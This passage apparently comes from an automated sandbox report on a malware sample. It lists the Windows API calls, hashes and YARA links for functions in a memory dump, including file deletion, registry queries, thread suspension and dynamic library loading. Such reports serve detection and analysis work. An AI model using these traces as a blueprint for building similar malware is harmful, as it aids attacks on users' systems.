                                                            • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04BB1A10
                                                            • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 04BB1A38
                                                            • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 04BB1A8A
                                                            • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 04BB1A95
                                                            • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04BB1AA8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                            • String ID:
                                                            • API String ID: 499515686-0
                                                            • Opcode ID: 55542defdd3b1a06fba0156ec8fb513ce805d129cd37b032ac5bc0a4998c4cbb
                                                            • Instruction ID: a08008a1a1b64fd9c43c79314f538b57932ba24e7ce72db6d9e862e9a04e69fd
                                                            • Opcode Fuzzy Hash: 55542defdd3b1a06fba0156ec8fb513ce805d129cd37b032ac5bc0a4998c4cbb
                                                            • Instruction Fuzzy Hash: 9F415F71900209EFDF10EFA8CC94AFE7BB9FF04384F5481A9E851A6050D7B4AB51DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBC5F4, Relevance: 7.9, APIs: 6, Instructions: 399COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC374E: memset.NTDLL ref: 04BC376E
                                                              • Part of subcall function 04BC374E: memset.NTDLL ref: 04BC38A2
                                                              • Part of subcall function 04BC374E: memset.NTDLL ref: 04BC38B7
                                                            • memcpy.NTDLL(?,00008F12,0000011E), ref: 04BBC679
                                                            • memset.NTDLL ref: 04BBC6AF
                                                            • memset.NTDLL ref: 04BBC6FD
                                                            • memset.NTDLL ref: 04BBC77C
                                                            • memset.NTDLL ref: 04BBC7EB
                                                            • memset.NTDLL ref: 04BBC8BB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: 612c5f90b059356375bd2acd7ae65c426e753bdc294a7d2a4465a8e7fa69bc19
                                                            • Instruction ID: fa8819f8f994c0050c8c5bc440167d2a0679971de93f111220d86291b4424665
                                                            • Opcode Fuzzy Hash: 612c5f90b059356375bd2acd7ae65c426e753bdc294a7d2a4465a8e7fa69bc19
                                                            • Instruction Fuzzy Hash: 7DF1DC30600B898FDB31CF69C9946FABBF0FB92304F144DADC5D696681D2B1BA45CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB36C0, Relevance: 6.1, APIs: 4, Instructions: 111stringnativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04BB3716
                                                            • lstrlenW.KERNEL32(?), ref: 04BB3724
                                                            • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 04BB374F
                                                            • lstrcpyW.KERNEL32(00000006,00000000), ref: 04BB377C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Query$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3961825720-0
                                                            • Opcode ID: ff8f9279942ed68d1eea02ebed5a64259a6b6727ea6a6dde37b24d01568e7e32
                                                            • Instruction ID: 4ac9c58887497cee9f6808be23221ddfcc2bd3ca1330fd5419be73dc7488dad7
                                                            • Opcode Fuzzy Hash: ff8f9279942ed68d1eea02ebed5a64259a6b6727ea6a6dde37b24d01568e7e32
                                                            • Instruction Fuzzy Hash: 6E410BB1500209FFEB11CFA9C9C4EAEBBB8EF04314F1451A9ED45A6150D7B5EA119BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA4851, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BA4873
                                                              • Part of subcall function 04BA4173: NtAllocateVirtualMemory.NTDLL(04BA489B,00000000,00000000,04BA489B,00003000,00000040), ref: 04BA41A4
                                                              • Part of subcall function 04BA4173: RtlNtStatusToDosError.NTDLL(00000000), ref: 04BA41AB
                                                              • Part of subcall function 04BA4173: SetLastError.KERNEL32(00000000), ref: 04BA41B2
                                                            • GetLastError.KERNEL32(?,00000318,00000008), ref: 04BA4983
                                                              • Part of subcall function 04BB9180: RtlNtStatusToDosError.NTDLL(00000000), ref: 04BB9198
                                                            • memcpy.NTDLL(00000218,04BC4EE0,00000100,?,00010003,?,?,00000318,00000008), ref: 04BA4902
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04BA495C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                                            • String ID:
                                                            • API String ID: 2966525677-0
                                                            • Opcode ID: f483e557f68ac74220d686c56100cf99801a92e244368ca68ccb01652d4636ee
                                                            • Instruction ID: e633821edd2164c66dd1b3b665bd2a822f8fc0c45bfb09835b1e55223d4ca5d5
                                                            • Opcode Fuzzy Hash: f483e557f68ac74220d686c56100cf99801a92e244368ca68ccb01652d4636ee
                                                            • Instruction Fuzzy Hash: 1B317371905309EFDB20DF64D989AAAF7F8EB18344F1045AAE545E7240E7B0FE64CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB618E, Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 257memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 04BB61AF
                                                            • GetTickCount.KERNEL32 ref: 04BB61C9
                                                            • wsprintfA.USER32 ref: 04BB621C
                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 04BB6228
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 04BB6233
                                                            • _aulldiv.NTDLL(?,?,?,?), ref: 04BB6249
                                                            • wsprintfA.USER32 ref: 04BB625F
                                                            • wsprintfA.USER32 ref: 04BB627D
                                                            • wsprintfA.USER32 ref: 04BB6294
                                                            • wsprintfA.USER32 ref: 04BB62B5
                                                            • wsprintfA.USER32 ref: 04BB62F0
                                                            • wsprintfA.USER32 ref: 04BB6314
                                                            • lstrcat.KERNEL32(?,?), ref: 04BB634C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BB6366
                                                            • GetTickCount.KERNEL32 ref: 04BB6376
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BB638A
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BB63A8
                                                            • StrTrimA.SHLWAPI(00000000,04BC63D8,00000000,05C8B188), ref: 04BB63DD
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BB63FD
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BB6408
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 04BB640C
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 04BB648D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04BB649C
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,05C8B188), ref: 04BB64AB
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BB64BD
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB64CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
                                                            • String ID: F{U{
                                                            • API String ID: 2878544442-3347341033
                                                            • Opcode ID: de5bc5d48d3022eca0c8b69f535b3d0ef1cf44a45f4d283f8a065cdf065bc3ec
                                                            • Instruction ID: 45f20592997b46c8d0e43ff2a8e75d48b35b8a40e56c2935b11314b7478791d8
                                                            • Opcode Fuzzy Hash: de5bc5d48d3022eca0c8b69f535b3d0ef1cf44a45f4d283f8a065cdf065bc3ec
                                                            • Instruction Fuzzy Hash: D0A15671504209EFDB01DFA9ECC5EAA7BE9EB4C304F044466F948D7251DA78EC248FA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC05BA, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 276memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 04BC05ED
                                                            • wsprintfA.USER32 ref: 04BC0652
                                                            • wsprintfA.USER32 ref: 04BC0698
                                                            • wsprintfA.USER32 ref: 04BC06B9
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BC06F0
                                                            • wsprintfA.USER32 ref: 04BC070C
                                                            • wsprintfA.USER32 ref: 04BC0722
                                                            • wsprintfA.USER32 ref: 04BC0742
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BC075F
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BC0780
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BC079A
                                                              • Part of subcall function 04BB7DB7: lstrlen.KERNEL32(00000000,73BB81D0,?,00000000,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7DE2
                                                              • Part of subcall function 04BB7DB7: lstrlen.KERNEL32(?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7DEA
                                                              • Part of subcall function 04BB7DB7: strcpy.NTDLL ref: 04BB7E01
                                                              • Part of subcall function 04BB7DB7: lstrcat.KERNEL32(00000000,?), ref: 04BB7E0C
                                                              • Part of subcall function 04BB7DB7: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7E29
                                                            • StrTrimA.SHLWAPI(00000000,04BC63D8,00000000,05C8B188), ref: 04BC07CC
                                                              • Part of subcall function 04BA95DD: lstrlen.KERNEL32(05C89986,00000000,73BB81D0,00000000,04BB63E9,00000000), ref: 04BA95ED
                                                              • Part of subcall function 04BA95DD: lstrlen.KERNEL32(?), ref: 04BA95F5
                                                              • Part of subcall function 04BA95DD: lstrcpy.KERNEL32(00000000,05C89986), ref: 04BA9609
                                                              • Part of subcall function 04BA95DD: lstrcat.KERNEL32(00000000,?), ref: 04BA9614
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 04BC07F0
                                                            • lstrcat.KERNEL32(?,?), ref: 04BC07FE
                                                            • lstrcat.KERNEL32(?,00000000), ref: 04BC0805
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BC0810
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BC082C
                                                              • Part of subcall function 04BBBE8F: memcpy.NTDLL(?,04BB5AB0,00000010,?,?,?,?,?,?,?,?,?,?,04BC3452,00000000,00000001), ref: 04BBBEE0
                                                              • Part of subcall function 04BBBE8F: memcpy.NTDLL(00000000,00000001,04BB5AB0,0000011F), ref: 04BBBF73
                                                            • HeapFree.KERNEL32(00000000,?,00000001,05C8B188,?,?,?), ref: 04BC08FA
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04BC0909
                                                            • HeapFree.KERNEL32(00000000,?,00000000,05C8B188), ref: 04BC091B
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC092D
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC093C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpymemcpy$strcpy
                                                            • String ID: F{U{
                                                            • API String ID: 2173832509-3347341033
                                                            • Opcode ID: fada655f61804e112a89b15aaa4f4008b6ec8c7dfa999b00c5e6c49823ff887b
                                                            • Instruction ID: 07b39ff4fa8f4a04921a9f83a8b1f99093937ce7aa3854ef9b069df5f61b34a3
                                                            • Opcode Fuzzy Hash: fada655f61804e112a89b15aaa4f4008b6ec8c7dfa999b00c5e6c49823ff887b
                                                            • Instruction Fuzzy Hash: 55A15771508209EFDB01EFA8ECC4E5A7BE8EB8C304F05456AF558E7260D778ED158BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA1000, Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?), ref: 04BA1015
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C11
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C1D
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0C65
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0C80
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0CB8
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?), ref: 04BC0CC0
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0CE3
                                                              • Part of subcall function 04BC0BC5: wcscpy.NTDLL ref: 04BC0CF5
                                                              • Part of subcall function 04BC0BC5: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04BC0D1B
                                                              • Part of subcall function 04BC0BC5: RtlEnterCriticalSection.NTDLL(?), ref: 04BC0D50
                                                              • Part of subcall function 04BC0BC5: RtlLeaveCriticalSection.NTDLL(?), ref: 04BC0D6C
                                                              • Part of subcall function 04BC0BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04BC0D85
                                                              • Part of subcall function 04BC0BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04BC0D97
                                                              • Part of subcall function 04BC0BC5: FindClose.KERNEL32(?), ref: 04BC0DAC
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0DC0
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0DE2
                                                            • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 04BA1071
                                                            • memcpy.NTDLL(00000000,?,00000000), ref: 04BA1084
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BA109B
                                                              • Part of subcall function 04BC0BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04BC0E58
                                                              • Part of subcall function 04BC0BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04BC0E6A
                                                              • Part of subcall function 04BC0BC5: FindClose.KERNEL32(?), ref: 04BC0E85
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 04BA10C6
                                                            • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 04BA10DE
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BA1138
                                                            • lstrlenW.KERNEL32(00000000,?), ref: 04BA115B
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BA116D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 04BA11E1
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BA11F1
                                                              • Part of subcall function 04BB4B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04BA1211,?), ref: 04BB4B72
                                                              • Part of subcall function 04BB4B63: mbstowcs.NTDLL ref: 04BB4B8E
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 04BA121A
                                                            • lstrlenW.KERNEL32(04BCD8B0,?), ref: 04BA1294
                                                            • DeleteFileW.KERNEL32(?,?), ref: 04BA12C2
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BA12D0
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BA12F1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                                            • String ID:
                                                            • API String ID: 72361108-0
                                                            • Opcode ID: be6c0e17e9e2603e7a78636f98566d5a8aad775c976d647b253cc281c4aad32a
                                                            • Instruction ID: 7ea9b98a03b476dedf76ba7e5c2e65c119508ebb96fd5231234d98a5f9aa7227
                                                            • Opcode Fuzzy Hash: be6c0e17e9e2603e7a78636f98566d5a8aad775c976d647b253cc281c4aad32a
                                                            • Instruction Fuzzy Hash: 6891277590021EEFDB10DFA5DCC8CAA7BBCEB49348B098066B609D7252D634E958CB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB64E2, Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BB6504
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BB6521
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04BB6571
                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 04BB657B
                                                            • GetLastError.KERNEL32 ref: 04BB6585
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BB6596
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04BB65B8
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB65EF
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BB6603
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 04BB660C
                                                            • SuspendThread.KERNEL32(?), ref: 04BB661B
                                                            • CreateEventA.KERNEL32(04BCC1A8,00000001,00000000), ref: 04BB662F
                                                            • SetEvent.KERNEL32(00000000), ref: 04BB663C
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BB6643
                                                            • Sleep.KERNEL32(000001F4), ref: 04BB6656
                                                            • ResumeThread.KERNEL32(?), ref: 04BB667A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                            • String ID:
                                                            • API String ID: 1011176505-0
                                                            • Opcode ID: 62f7b4283c6ee0ae2622d031d0d033029ae97fa3e52baeea601bf91a98d5b164
                                                            • Instruction ID: 96b6f6c80a76eaf92caf603de9196bfac8ed117bdf7e0747b71a8209d78a02a8
                                                            • Opcode Fuzzy Hash: 62f7b4283c6ee0ae2622d031d0d033029ae97fa3e52baeea601bf91a98d5b164
                                                            • Instruction Fuzzy Hash: 28411F71900109EFDB109FA4ECC8DBDBBB9FB18305B1480AAF546E3114D775AEA1CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC34B3, Relevance: 21.2, APIs: 14, Instructions: 230memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,73BCF710,00000000,00000000), ref: 04BC34FA
                                                            • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 04BC3518
                                                            • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?,?,?,?,?,?,04BB2FCF), ref: 04BC3546
                                                            • HeapFree.KERNEL32(00000000,04BC63D8,0000002A,00000000,00000000,00000000,00000000,?,00000001,04BC63D8,00000002,?,?), ref: 04BC35BA
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BC367D
                                                            • wsprintfA.USER32 ref: 04BC3698
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04BB2FCF), ref: 04BC36A3
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04BB2FCF), ref: 04BC36BA
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,04BC63D8,00000002,?), ref: 04BC36DC
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BC36F7
                                                            • wsprintfA.USER32 ref: 04BC370E
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04BB2FCF), ref: 04BC3719
                                                              • Part of subcall function 04BAA6F7: lstrlen.KERNEL32(04BA47C4,00000000,00000000,?,?,?,04BA47C4,00000035,00000000,-00000005,00000000), ref: 04BAA727
                                                              • Part of subcall function 04BAA6F7: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BAA73D
                                                              • Part of subcall function 04BAA6F7: memcpy.NTDLL(00000010,04BA47C4,00000000,?,?,04BA47C4,00000035,00000000), ref: 04BAA773
                                                              • Part of subcall function 04BAA6F7: memcpy.NTDLL(00000010,00000000,00000035,?,?,04BA47C4,00000035), ref: 04BAA78E
                                                              • Part of subcall function 04BAA6F7: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04BAA7AC
                                                              • Part of subcall function 04BAA6F7: GetLastError.KERNEL32(?,?,04BA47C4,00000035), ref: 04BAA7B6
                                                              • Part of subcall function 04BAA6F7: HeapFree.KERNEL32(00000000,00000000,?,?,04BA47C4,00000035), ref: 04BAA7D9
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04BB2FCF), ref: 04BC3730
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,04BC63D8,00000002,?,?), ref: 04BC3740
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
                                                            • String ID:
                                                            • API String ID: 3733591251-0
                                                            • Opcode ID: 7e95b74091aa77cc1dbfc66b586756786d0cc72d5c260f0bc81533b6ace3a6fd
                                                            • Instruction ID: 1a2a7b25365da5d38f70195dfb3a003949b65a86dc74c5a991166349787d25e4
                                                            • Opcode Fuzzy Hash: 7e95b74091aa77cc1dbfc66b586756786d0cc72d5c260f0bc81533b6ace3a6fd
                                                            • Instruction Fuzzy Hash: 03817DB1904119FFDB209FA5DCC8DBEBBB9FB08304B4444AAF915A3250D775AE91CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB6687, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 04BB66C9
                                                            • OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 04BB66DC
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BB67F4
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • memset.NTDLL ref: 04BB66FF
                                                            • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 04BB677E
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04BB6793
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04BB67AB
                                                            • GetLastError.KERNEL32(04BB54DA,?,?,?,?,?,?,?,00000040), ref: 04BB67C3
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04BB67CF
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04BB67DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                                            • String ID: 0x%08X$W
                                                            • API String ID: 1559661116-2600449260
                                                            • Opcode ID: 43016cb777b06d50d8443a60fd22c1e71b5062594e3e268a3ac9e973504762c9
                                                            • Instruction ID: 48da311168723fef7195fe9fc10271ae047678183935da3fa7387f7fec363377
                                                            • Opcode Fuzzy Hash: 43016cb777b06d50d8443a60fd22c1e71b5062594e3e268a3ac9e973504762c9
                                                            • Instruction Fuzzy Hash: 664181B1900209EFDB10DFA5C884AEEBBF8FF08354F10456AE999D7240D7B5EA54CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB7E67, Relevance: 21.1, APIs: 14, Instructions: 107libraryloaderstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7E74
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,04BBCCC5,?,?), ref: 04BB7E9D
                                                            • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04BB7EBD
                                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 04BB7ED8
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,04BBCCC5,?,?), ref: 04BB7EE4
                                                            • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,04BBCCC5,?,?), ref: 04BB7EE7
                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7EF3
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F10
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F2A
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F40
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F56
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F6C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F82
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7FAB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                                            • String ID:
                                                            • API String ID: 3772355505-0
                                                            • Opcode ID: 4f57cd3d7d842ea5829e1559b29a522c3815a16d234f6443172239579d3a88be
                                                            • Instruction ID: bf1fbb571edf6e583f5272d5f0be1a4c5237e7e9d37a6b3b9da194f4fdf366b9
                                                            • Opcode Fuzzy Hash: 4f57cd3d7d842ea5829e1559b29a522c3815a16d234f6443172239579d3a88be
                                                            • Instruction Fuzzy Hash: 513168B190430AAFD710CF65CCD4DAA7BECEF48344B088566B948C7212EB79E815CBB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB80E4, Relevance: 21.1, APIs: 14, Instructions: 79stringmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB80FB
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB8106
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB810E
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB8123
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BB8134
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04BB8146
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB814B
                                                            • lstrcatW.KERNEL32(00000000,04BC63D0), ref: 04BB8157
                                                            • lstrcatW.KERNEL32(00000000), ref: 04BB815F
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB8164
                                                            • lstrcatW.KERNEL32(00000000,04BC63D0), ref: 04BB8170
                                                            • lstrcatW.KERNEL32(00000000,00000002), ref: 04BB818B
